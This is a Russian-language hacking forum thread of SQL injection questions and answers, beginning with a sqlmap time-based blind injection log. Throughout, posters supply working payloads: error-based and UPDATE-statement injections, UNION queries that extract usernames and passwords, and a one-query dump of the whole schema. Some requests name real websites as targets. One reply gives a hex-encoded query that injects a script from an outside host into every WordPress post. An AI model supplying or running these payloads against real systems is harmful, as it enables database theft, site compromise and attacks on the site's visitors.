[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>164592),SLEEP(10),9830)

.

[19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>160487),SLEEP(10),9830)

.

[19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>871054),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>913561),SLEEP(10),9830)

.

[19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>478526),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>192387),SLEEP(10),9830)

.

[19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>330357),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>385436),SLEEP(10),9830)

.

[19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>145149),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>823404),SLEEP(10),9830)

.

[19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>142557),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>848401),SLEEP(10),9830)

.

[19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>487756),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>840171),SLEEP(10),9830)

.

[19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>800333),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>899978),SLEEP(10),9830)

.

[19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>502795),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>128986),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>227072),SLEEP(10),9830)

.

[19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>648363),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>656500),SLEEP(10),9830)

.

[19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>280401),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>721896),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>769715),SLEEP(10),9830)

.

[19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>689458),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>747115),SLEEP(10),9830)

.

[19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>103578),SLEEP(10),9830)

. (done)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>52),SLEEP(10),9830)

[19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>48),SLEEP(10),9830)

[19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>1),SLEEP(10),9830)

[19:42:02] [INFO] retrieved:

[19:42:02] [DEBUG] performed 4 queries in 15.59 seconds

[19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel

token'

[19:42:02] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

[19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'

shutting down at 19:42:09

Octavian
14.10.2017, 20:42
Как в акунетикс настроить скан без тестирование повторяющихся страниц index.php?id=1, index.php?id=2, index.php?id=3

karkajoi
14.10.2017, 22:14
Добрый вечер, вопрос уже задавал не могу найти где мне ответили, вообщем, какой запрос чтоб вывести перечень соседних БД при sql inject?

BadBoris
17.10.2017, 22:42
Всем привет!

Недавно обнаружил, что есть доступ к моим БД извне: nauchniestati.ru/phpmyadmin/

Насколько это опасно? Как это исправить?

Там ещё какие-то ошибки в файлах

./../php/php-gettext/streams.php

./../php/php-gettext/gettext.php

Кто-нибудь может помочь?

Octavian
20.10.2017, 20:24
Интересует возможность SQL Injection при такои фильтрацыии


Code:
function mssql_custom_escape($str, $trim = true, $encode = true) {
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
if ($trim) $str = trim($str);
if ($encode) $str = htmlspecialchars($str);

return preg_replace("#'#", "''", $str);
}

winstrool
20.10.2017, 20:58
Если запрос что то типо:


?id=123+%27+or(ExtractValue(1,version()))+--+\


то как вариант вывод при уязвимом параметре не обремененном кавычками


select * from users where id=123 '' or(ExtractValue(1,version())) -- \


т.е получается как SQLI можно разкрутить, второй пример как вариант обремененными кавычками:


select * from users where id=
'
123 '' or(ExtractValue(1,version())) -- \
'


т.е можно разкрутить как ErrorBased

Octavian
20.10.2017, 23:24
Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'

Непонял получяются 3 кавычке запрос не выполнется

karkajoi
21.10.2017, 00:34
Octavian said:
↑ (https://antichat.live/posts/4140604/)

Code:
select * from users where id='123 '' or(ExtractValue(1,version())) -- \'

Непонял получяются 3 кавычке запрос не выполнется


по пробуй updatexml

panic.ker
22.10.2017, 23:12
garrik said:
↑ (https://antichat.live/posts/4140921/)
Господа, можно ли раскрутить этот баг ? Добавление символов "%2527" к ссылке приводит к такой ошибке
Будут ли какие-то соображения ? буду сильно благодарен любой информации


Иньекция в limit'е после order by. Советую ознакомиться

https://rdot.org/forum/showpost.php?p=36186&postcount=30

Kirza
23.10.2017, 16:22
Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.

winstrool
23.10.2017, 17:26
Kirza said:
↑ (https://antichat.live/posts/4141575/)
Всем привет - Можно ли как то в PhpMyAdmin в базе wp_post - колонка post_content = добавить во все посты сразу, путём составления запроса - свой яваскрипт , если такая возможность есть - напишите.


как то так:

update wp_post set post_content=post_content+'JSSCRIPT'

Kirza
23.10.2017, 19:05
winstrool said:
↑ (https://antichat.live/posts/4141601/)
как то так:
update wp_post set post_content=post_content+'JSSCRIPT'


--- походу не так расписал таблицы #1146 - Table 'wordpress1.wp_post' doesn't exist

БД wordpress1 > wp_post > post_content

BabaDook
23.10.2017, 19:39
Вам пример кинули, вектор, значение вы свои подставляйте .

Kirza
23.10.2017, 20:44
BabaDook said:
↑ (https://antichat.live/posts/4141659/)
Вам пример кинули, вектор, значение вы свои подставляйте .


Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0

M_script
23.10.2017, 21:25
Kirza said:
↑ (https://antichat.live/posts/4141674/)
Суть понятна - просто текст - добавился на ура - скрипт - не хочет ( пробовал разными путями со скобками - ток же 0


Напиши свой код. Телепатов нет.

Kirza
23.10.2017, 22:14
Так пашет update wp_posts set post_content=post_content+'123'

так нет update wp_posts set post_content=post_content+''

BabaDook
23.10.2017, 22:29
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''


А толку? Всё равно скрипт не сработает? Иными словами, вы так же можете написать это в форму сообщения. СКРИПТ будет как ткст,

crlf
24.10.2017, 02:07
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''




Code:
UPDATE wp_posts SET post_content = CONCAT(post_content, '');

winstrool
24.10.2017, 09:31
Kirza said:
↑ (https://antichat.live/posts/4141714/)
Так пашет update wp_posts set post_content=post_content+'123'
так нет update wp_posts set post_content=post_content+''


Ну засунь значение в хекс:


update wp_posts set post_content=post_content+0x3C73637269707420737263 3D22687474703A2F2F73696E75732E72752F7069642E706870 3F6B79653D3863633362267468726F74746C653D302E352673 655F636865636B3D66616C7365223E3C2F7363726970743E

VKAPI
24.10.2017, 19:59
помогите с решение..

Есть устройство на Уникс..

Подключенно к моей вафле по роутру на Linux

как раскопать хранилище файлов устройсва..

при условии что устройсво у меня в руке.

SSH не удалось из за отсутвия опыта серьёзного

Octavian
24.10.2017, 21:03
КАК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?


Code:
# Запрещено выполнение любого кода в директории загрузке файлов
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml

crlf
25.10.2017, 00:05
VKAPI said:
↑ (https://antichat.live/posts/4142060/)
SSH не удалось из за отсутвия опыта серьёзного


https://www.digitalocean.com/commun...e-sshfs-to-mount-remote-file-systems-over-ssh (https://www.digitalocean.com/community/tutorials/how-to-use-sshfs-to-mount-remote-file-systems-over-ssh)


Octavian said:
↑ (https://antichat.live/posts/4142084/)
АК ЗАПИСАТЬ ЭТО В .HTACCESS ИЗ ГЛАВНОИ ДИРЕКТОРИИ НО СЫЛАЛОСЬ ТОЛЬКО НА ПАПКИ "files". "images"?


https://httpd.apache.org/docs/2.4/mod/core.html#directory

foozzione
26.10.2017, 19:48
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.


Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2

такая же есть с insert

crlf
27.10.2017, 00:09
Если где-то видно name, то можно сделать так:


Code:
123', name = version() where id_users=65 and id=33 #

где 123 валидный cardno.

Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.

foozzione
27.10.2017, 00:58
crlf said:
↑ (https://antichat.live/posts/4142780/)
Если где-то видно
name
, то можно сделать так:

Code:
123', name = version() where id_users=65 and id=33 #

где
123
валидный
cardno
.
Иначе, крутить как error based, вывод ошибок есть. Материалов на эту тему много.


коммент не канает... ни --, ни #

crlf
27.10.2017, 01:01
foozzione said:
↑ (https://antichat.live/posts/4142801/)
коммент не канает... ни --, ни #


Что пишет?

t0ma5
27.10.2017, 13:11
foozzione said:
↑ (https://antichat.live/posts/4142706/)
Вопрос, как раскрутить данную скулю? Через sqlmap не выходит, сразу разлогинивает, даже если передавать все заголовки.

Code:
update users_cards set cardno = ''', name = '' where id_users=65 and id=33
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''', name = '' where id_users=65 and id=33' at line 2

такая же есть с insert


update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33

foozzione
27.10.2017, 14:00
crlf said:
↑ (https://antichat.live/posts/4142803/)
Что пишет?




Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3

foozzione
27.10.2017, 14:01
t0ma5 said:
↑ (https://antichat.live/posts/4142929/)
update users_cards set cardno = '
',cardno=version(), name='
', name = '' where id_users=65 and id=33


сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?

t0ma5
27.10.2017, 14:03
foozzione said:
↑ (https://antichat.live/posts/4142952/)
сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?


да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом

насчет файлов не проверял, если file_priv = ON возможно получится читать файлы

foozzione
27.10.2017, 14:26
t0ma5 said:
↑ (https://antichat.live/posts/4142954/)
да, можно через dios составить схему базы
http://forum.sqliwiki.com/showthread.php?tid=39
чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы


просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это

t0ma5
27.10.2017, 14:28
foozzione said:
↑ (https://antichat.live/posts/4142962/)
просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это


хз должно работать


Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='

-----------------

ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить

foozzione
27.10.2017, 14:42
t0ma5 said:
↑ (https://antichat.live/posts/4142964/)
хз должно работать

Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='

-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить



buh:id,
buhos,
buh:name,
buhrderid,
buh:note,
buh:type_,
buh:active,
buh:val1_name,
buh:val1_amount,
buh:val1_rest,
buh:val1_com,
buh:val2_nam

в name тоже скуля, там места больше, вот что выдало

foozzione
27.10.2017, 14:53
t0ma5 said:
↑ (https://antichat.live/posts/4142964/)
хз должно работать

Code:
',cardno=(SELECT group_conCat('
',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='

-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить


кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже

t0ma5
27.10.2017, 15:00
foozzione said:
↑ (https://antichat.live/posts/4142972/)
кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже


как запросы к information_schema писать чтоль, серьезно)?


Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.columns where table_name='table' limit 1,1

таки вещи давно описаны - /threads/sql-injection-polnyj-faq.43966/ (https://antichat.live/threads/sql-injection-polnyj-faq.43966/)

foozzione
27.10.2017, 15:01
t0ma5 said:
↑ (https://antichat.live/posts/4142975/)
как запросы к information_schema писать чтоль, серьезно)?

Code:
SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.tables where table_name='table' limit 1,1

таки вещи давно описаны -
/threads/sql-injection-polnyj-faq.43966/ (https://antichat.live/threads/sql-injection-polnyj-faq.43966/)


да я вялого поймал, запутал сам себя с запросов в update, мало с ним связывался... лул

crlf
27.10.2017, 15:14
foozzione said:
↑ (https://antichat.live/posts/4142949/)

Code:
update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3



Мистика После коммента с двумя прочерками пробел ставишь?

foozzione
27.10.2017, 15:41
crlf said:
↑ (https://antichat.live/posts/4142990/)
Мистика
После коммента с двумя прочерками пробел ставишь?


конечно

winstrool
27.10.2017, 23:21
crlf said:
↑ (https://antichat.live/posts/4142990/)
Мистика
После коммента с двумя прочерками пробел ставишь?


Не поверишь!!! иногда благодаря этому и схватывается скуль)))), хз почему так...

VKAPI
28.10.2017, 07:14
в Яблочное хранилище файлов кто нить влазил ? при условии если телефон в руке ?

kacergei
29.10.2017, 03:52
sql-injection

Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?

Даже с тем же table_name режет не говоря уже про таблицы с префиксом

t0ma5
29.10.2017, 19:04
kacergei said:
↑ (https://antichat.live/posts/4143583/)
sql-injection
Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
Даже с тем же table_name режет не говоря уже про таблицы с префиксом


двойной урлэнкод, /*%00*/ в начале запроса, запрос можно только одним методом передавать? попробовать другие(GET/POST/COOKIE)

/threads/zadanie-1.453986/page-2#post-4120139 (https://antichat.live/threads/zadanie-1.453986/page-2/) - редкий случай, но тоже может быть

Octavian
29.10.2017, 22:50
Можно провести SQL Injection?


Code:
$login = $_POST['login'];
$login = stripslashes($login);
$login = htmlspecialchars($login);

t0ma5
30.10.2017, 04:07
Octavian said:
↑ (https://antichat.live/posts/4143835/)
Можно провести SQL Injection?

Code:
$login = $_POST['login'];
$login = stripslashes($login);
$login = htmlspecialchars($login);



эм а трабла конкретно в чём? давай подробней

[CODE]
Code:
$ cat 1.php

Octavian
03.11.2017, 22:57
В iframe невозможно открыть страницу если у саита https как у vk например

garrik
05.11.2017, 01:24
Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?

То есть имеем запрос "DELETE FROM My_Messages WHERE Message_Number =Инъекция

К сожалению база данных не поддерживает разделение запросов с помощью точки с запятой.

crlf
05.11.2017, 02:14
garrik said:
↑ (https://antichat.live/posts/4146326/)
Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?


Можно. Нужно изучить материал по error и time based инъекциям.

garrik
05.11.2017, 18:18
Спасибо, нужно серьезно зарываться в эту тему, за денек такое не осилишь.

Еще вопрос: при такой уязвимости: SELECT subject, message WHERE ID=1'+инъекция, создается таблица с двумя строками, первая строка - данные "subject, message", вторая - данные, полученные с помощью оператора UNION инъекции. Проблема в том, что выводится в браузере только первая строка. Можно ли как-то вывести данные со второй строки ? Может есть возможность как-то соединить две строки в одну в одном запросе ? При ID=-1 ничего не выводит

crlf
05.11.2017, 23:04
garrik said:
↑ (https://antichat.live/posts/4146513/)
как-то соединить две строки в одну


Пост не осилил. Исходя из того, что удалось понять, стоит смотреть в сторону мануалов и изучения синтаксиса запросов. К примеру, в MySQL строки можно объеденить используя CONCAT.

garrik
05.11.2017, 23:34
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1

формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....

cat1vo
06.11.2017, 01:08
garrik said:
↑ (https://antichat.live/posts/4146638/)
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....


SELECT subject, message FROM messages WHERE id=1 UNION SELECT concat(user,':',password),2 FROM users WHERE id=1

dooble
06.11.2017, 10:23
garrik said:
↑ (https://antichat.live/posts/4146638/)
Может неправильно выразился, примерный код вместе с инъекцией: SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1
формирует таблицу с двумя строками, в браузере выводится только первая, а мне нужна вторая (с паролем). О CONCAT думал, сейчас читаю о ней.....


Нужная строки выбирается limit n-1,1.

SELECT subject, message FROM messages WHERE id=1 UNION SELECT user, password FROM users WHERE id=1 limit 1,1

Br@!ns
07.11.2017, 21:28
мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?

Muracha
08.11.2017, 19:46
Br@!ns said:
↑ (https://antichat.live/posts/4147325/)
мб кто вкурсе, можно ли в wordpress авторизоваться в админку не через wp-login.php? на нее штака стоит. На /wp-admin/ пускает но редиректит, куки админа не перехватить, но админские аккаунты имеются, какие есть варианты?


Действительно ли это админка? Подходит ли пароль к мылу, к фтп, и прочим сервисам?

Mobilesouyhj
10.11.2017, 14:09
Что можно сделать с этой скулей? http://www.civildignity.ru/site_dev.php/ru/organisation_catalog/gallery/1631/fond_-inok-_den_za_dnem' как вытянуть бд? И где там админка?

Gorev
10.11.2017, 18:11
С чего вы взяли что это скуля?

Warning: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in /var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php on line 592

В самой ошибке ответ на все.

Mobilesouyhj
10.11.2017, 18:16
Gorev said:
↑ (https://antichat.live/posts/4148230/)
С чего вы взяли что это скуля?
Warning
: realpath(): open_basedir restriction in effect. File(/usr/share/php) is not within the allowed path(s): (/var/www/civil/data:.) in
/var/www/civil/data/www/_symfony-1.4.19/lib/util/sfToolkit.class.php
on line
592

В самой ошибке ответ на все.


Т.е. залится не получится?

Gorev
10.11.2017, 19:17
Mobilesouyhj said:
↑ (https://antichat.live/posts/4148233/)
Т.е. залится не получится?


Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла.

1.определить если есть ошибка

2.определить вектор атаки

3. Эксплуатируй уязвимость

4.используйте полученную информацию для получения доступа

В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...

Mobilesouyhj
10.11.2017, 20:05
Gorev said:
↑ (https://antichat.live/posts/4148263/)
Такое ощущение что вы где то услышали термины: скуля,админка,залится и используете их не понимая смысла.
1.определить если есть ошибка
2.определить вектор атаки
3. Эксплуатируй уязвимость
4.используйте полученную информацию для получения доступа
В твоём случае к чему вопрос о заливке если даже намека на уязвимость нет,не считая раскрытие путей,найди инъекцию,посмотри на права юзера,если file_priv=on,тогда задавай вопрос о заливке,или же получи данные от панели управления и тогда задавай вопрос о заливке,или вылови куки админа,и тогда задавай вопрос о заливке. Можно продолжать долго...


Да там нет уязвимостей я уже протестил, за то сайт весь на ошибках )) кстати : on /phpinfo.php

Gorev
10.11.2017, 20:09
Что-on? Если про file_priv,то мне кажется вы что то путаете.

Mobilesouyhj
10.11.2017, 20:40
Mobilesouyhj said:
↑ (https://antichat.live/posts/4148289/)
Да там нет уязвимостей, за то сайт весь на ошибках ))




Gorev said:
↑ (https://antichat.live/posts/4148290/)
Что-on? Если про file_priv,то мне кажется вы что то путаете.


Там не одной скули нет

Muracha
11.11.2017, 19:03
Вопрос такой.

Есть иньекция на сайте. Таблицы выдергиваются из базы "А".

На сервере под одним пользователем крутиться 3 базы: А. Б.С.

Как составить запрос, чтобы можно выдернуть таблицы, колонки из базы Б и С?

Так берутся данные из базы А.


http://site/shop.php?id=-260+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14 FROM INFORMATION_SCHEMA.TABLES -- (http://site/shop.php?id=-260+union+select+1,2,3,4,5,table_name,7,8,9,10,11, 12,13,14%20FROM%20INFORMATION_SCHEMA.TABLES%20--)


sqlmap не советуйте, сервер настроен так, что надо ручками.

Когда я написал этот пост я не остановился. Я стал искать дальше и выяснил, что это можно сделать следующим запросом:


http://site/shop/shop.php?id=-260+u...n_schema.tables WHERE table_schema=0x63172 -- (http://site/shop/shop.php?id=-260+union+select+1,2,3,group_concat(table_name+SEP ARATOR+0x0b),5,6,7,8,9,10,11,12,13,14%20FROM%20inf ormation_schema.tables%20WHERE%20table_schema=0x63 172%20--)


group_concat(table_name+SEPARATOR+0x0b) - выводит список таблиц

FROM%20information_schema.tables%20WHERE%20table_s chema=0x6372%20-- - откуда брать таблицы.

ЗаHEXованная строчка - это название базы данных.

ну и колонки это:


http://localhost/sql.php?id=-1+UNIO...schema=0x74657374+AND+table_name=0x757365 7273 (http://localhost/sql.php?id=-1+UNION+SELECT+1,group_concat(column_name+SEPARATO R+0x0b)+FROM+information_schema.columns+WHERE+tabl e_schema=0x74657374+AND+table_name=0x7573657273)

crlf
11.11.2017, 20:55
Muracha said:
↑ (https://antichat.live/posts/4148617/)
Вопрос такой.


https://rdot.org/forum/showthread.php?t=60

cat1vo
11.11.2017, 21:30
Muracha said:
↑ (https://antichat.live/posts/4148617/)
Как составить запрос...




Code:
http://site/shop.php?id=-260+union+select+1,2,3,4,5,(select(@n)from(select( @n:=0x20),(select(null)from(information_schema.col umns)where(0x2b)in(@n:=concat(@n,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name))and(table _schema!=0x696e666f726d6174696f6e5f736368656d61))) n),7,8,9,10,11,12,13,14-- -

Для ознакомления прочтите (https://defcon.ru/web-security/2320/)

Sensoft
11.11.2017, 23:10
Muracha said:
↑ (https://antichat.live/posts/4148617/)
sqlmap не советуйте, сервер настроен так, что надо ручками.


level и risk выставлял ?

karkajoi
12.11.2017, 04:16
Sensoft said:
↑ (https://antichat.live/posts/4148670/)
level
и
risk
выставлял ?


Причем тут лвл и риск ? Говорит же что sqlmap не катит

garrik
13.11.2017, 01:06
